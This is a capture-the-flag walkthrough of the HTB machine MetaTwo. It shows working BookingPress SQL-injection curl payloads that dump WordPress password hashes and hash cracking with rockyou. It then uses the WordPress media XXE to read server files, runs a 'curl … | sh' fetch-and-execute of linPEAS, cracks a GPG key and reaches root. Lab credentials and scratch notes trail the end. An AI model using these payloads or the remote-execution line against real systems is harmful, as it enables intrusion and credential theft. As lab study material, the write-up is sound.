
# MetaTwo write-up 
_February 2023_

**Spoilers ahead!**

I started with the usual nmap to find what services were running on the target machine.
```bash
nmap --version-intensity 0 -p-10000 10.10.11.186
```
And got the following services and ports.
```
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
```

I noticed there was a http port open, so I copy-pasted the IP in the browser and got the url needed to add to /etc/hosts.
I then added the following line to /etc/hosts in order to connect to the website.
```
10.10.11.186 metapress.htb
```

Inspecting the website we find two interesting things:
 - A search bar on the about-us page;
 - A form that can be submitted on the events page.

I started by filling a form just to see how it worked.

Then I checked what would happen by querying special characters in the search bar.
I noticed that with the character `"` there was a weird response with 5 different pages.

One of this was the "sample page", and within this page there was a link to a WordPress dashboard login.

![wordpress_dashboard_login.png](wordpress_dashboard_login.png)

I suspected that the WordPress version running may be vulnerable.
I checked on wappalyzer the version used, which one can also see in the login page, and searched the web for exploits.
I mostly found exploits to use within a multimedia submission system, and since I was yet to login, I investigated other approaches.

Thus, I looked at other technologies the website may be using.
I inspected the website using burp, and it did not take long to notice the booking plugin the website was using for the forms.

![plugins.png](plugins.png)

I then searched for vulnerabilities related to these plugin and quickly found [one of interest](https://wpscan.com/vulnerability/388cd42d-b61a-42a4-8604-99b812db2357).
I proceeded to test it out as explained on the wpscan website.
```bash
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' --data 'action=bookingpress_front_get_category_services&_wpnonce=27bb5d419c&category_id=33&total_service=-7502) UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'
```
And it worked!
```
[{"bookingpress_service_id":"10.5.15-MariaDB-0+deb11u1","bookingpress_category_id":"Debian 11","bookingpress_service_name":"debian-linux-gnu","bookingpress_service_price":"$1.00","bookingpress_service_duration_val":"2","bookingpress_service_duration_unit":"3","bookingpress_service_description":"4","bookingpress_service_position":"5","bookingpress_servicedate_created":"6","service_price_without_currency":1,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]%
```

I then started trying to adapt the payload to leak information of interest.
It is important to note that the previous payload had 9 columns, and so [I would have to keep that for it to work given that it is a union injection](https://portswigger.net/web-security/sql-injection/union-attacks).

I started by searching [WordPress database structure](https://codex.wordpress.org/Database_Description).
To confirm that the tables do have the same names, I ran the following injection and checked the "bookingpress_category_id" column in the response.
```bash
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'  --data 'action=bookingpress_front_get_category_services&_wpnonce=27bb5d419c&category_id=33&total_service=-7502) UNION ALL SELECT table_schema,table_name,NULL,NULL,NULL,NULL,NULL,NULL,NULL from INFORMATION_SCHEMA.TABLES, -- -'
```
In the server response I got the same tables from the documentation.

I then adapted the payload to leak the users and their passwords.
At this point it is important to mind the letter casing.
```bash
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'  --data "action=bookingpress_front_get_category_services&_wpnonce=27bb5d419c&category_id=33&total_service=-7502) UNION ALL SELECT ID,user_login,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users-- -"
```

Looking at the fields of the response we can see both `ID`, `user_login` and `user_pass`. The injection worked.
```
[{"bookingpress_service_id":"1","bookingpress_category_id":"admin","bookingpress_service_name":"$P$BGrGrgf2wToBS79i07Rk9sN4Fzk.TV.","bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"},{"bookingpress_service_id":"2","bookingpress_category_id":"manager","bookingpress_service_name":"$P$B4aNM28N0E.tMy\/JIcnVMZbGcU16Q70","bookingpress_service_price":"$0.00","bookingpress_service_duration_val":null,"bookingpress_service_duration_unit":null,"bookingpress_service_description":null,"bookingpress_service_position":null,"bookingpress_servicedate_created":null,"service_price_without_currency":0,"img_url":"http:\/\/metapress.htb\/wp-content\/plugins\/bookingpress-appointment-booking\/images\/placeholder-img.jpg"}]
```

Furthermore, one can see that the `user_pass` field contains password hashes.
At this point, one can use [hash-id](https://github.com/tashima42/hash-id) to find out what hashing method is being used. 
To do this, one places the hashes in a file, one per line, and runs the following.
```bash
hash-id -f hashes.txt 
```
The output tells that these are MD5 hashes.

Next, I tried to substitute the admin password hash for my own hash, but did not succeed.
Here is one of the attempts. 
**Disclaimer: I am not sure if this should work.**
```bash
curl -i 'http://metapress.htb/wp-admin/admin-ajax.php'  --data "action=bookingpress_front_get_category_services&_wpnonce=27bb5d419c&category_id=33&total_service=-7502) UNION ALL SELECT ID,user_login,user_pass,NULL,NULL,NULL,NULL,NULL,NULL from wp_users-- 
UPDATE wp_users SET user_pass = MD5('bolas') WHERE ID = 1-- -"
```

Then, since I already had the password hashes I figured I might as well try to crack them using `johntheripper`.
To do this, I put the two hashes within a file.
Then, using the passwords from the popular "rockyou" list, I executed the following.
```bash
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hashes.txt
```
**Note: You have to remove escaping backslashes from the hash if you leaked them like I did, otherwise john will not work properly. It will not recognise the hashing method and will load multiple hashes as a single hash.**

With the command above one is able to get the password for the manager user.
Thus, I proceeded with the login.

After logging in, one finds a media upload page at the left.
At the start of the challenge I had checked if there was something interesting with the WordPress version the page was running, and I found that there was a known vulnerability related with the media upload.
Thus, [I went back to check how it worked](https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/).

I followed the exploit instructions, only changing my IP and got the contents of `/etc/passwd`.
With this I also found the system had a user (it was in one of the lines).

At this point, it would be helpful to get the WordPress configuration details in order to get some kind of access to the machine. 
After googling for a bit I found that the contents of the configuration should be within the `wp-config.php` file.
However, after a few tries, I could not get the file, so I figured the WordPress directory may not be exactly where I thought it was.

Since the server was running nginx, and after a bit of googling, I found [some possible locations for the Wordpress root directory](https://serverfault.com/a/717509).
Having this, I modified the payload again to get the contents of `/etc/nginx/sites-enabled/default`, where I found the following line.
```php
root /var/www/metapress.htb/blog;
```

Having this, I once again modified the payload to get the contents of `/var/www/metapress.htb/blog/wp-config.php`.
Within the file I found the server ftp credentials.

Using the credentials I logged in the ftp server.

After connecting, one quickly finds the file `send_email.php` within the `mailer` folder.
One can quickly view its contents using the following.
```ftp
get send_email.php -
```

Within the file one finds the credentials for the user ssh.
After connecting via ssh one can get the user flag within `user.txt` in the home directory.

At this point it is always good to check the sudo permissions of the user.
One can do this with the following.
```bash
sudo -l
```
Unfortunately the user did not have any permissions. 

Another good thing to do is to check for hidden files and folders.
One can list these using `ls -la`.
With this I found a directory called `.passpie`.
However, within it, I only found a folder called `ssh` with pgp messages within.
At this point I googled `passpie` and [found out it is a password manager](https://github.com/marcwebbie/passpie).

Thinking I may have missed something I opened a python server on my machine, sent [linPEAS](https://github.com/carlospolop/PEASS-ng) using curl and executed it.
```bash
python3 -m http.server 4444 # on my machine
curl 10.10.10.10:4444/linpeas.sh | sh #Victim
```
In the output I was able to find a file I had missed!
```
══╣ Possible private SSH keys were found!
/home/jnelson/.passpie/.keys
```
I inspected the `.keys` file and found it contained a private and a public key.
I then sent the `.keys` file over to my machine hoping to crack the private key using the `rockyou` list of passwords again.
```bash
scp jnelson@metapress.htb:.passpie/.keys keys 
# removed the public key from the file after getting it in my machine
gpg2john keys > hash
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
```
This gave me the password!
I assumed this would be the password for passpie.
I went back to the target machine and exported the root password from passpie.
```bash
touch bolas
passpie export bolas
cat bolas
```
Within the file there was the root credential!
I proceeded to change user to root and got the root flag.
```bash
su root
cat root.txt
```


jnelson:x:1000:1000:jnelson,,,:/home/jnelson:/bin/bash

define( 'FTP_USER', 'metapress.htb' );
define( 'FTP_PASS', '9NYS_ii@FyL_p5M2NvJ' );
define( 'FTP_HOST', 'ftp.metapress.htb' );

$mail->Username = "jnelson@metapress.htb";                 
$mail->Password = "Cb4_JmWM8zUZWMu@Ys";       



por php nas tools
adicionar as outras tools









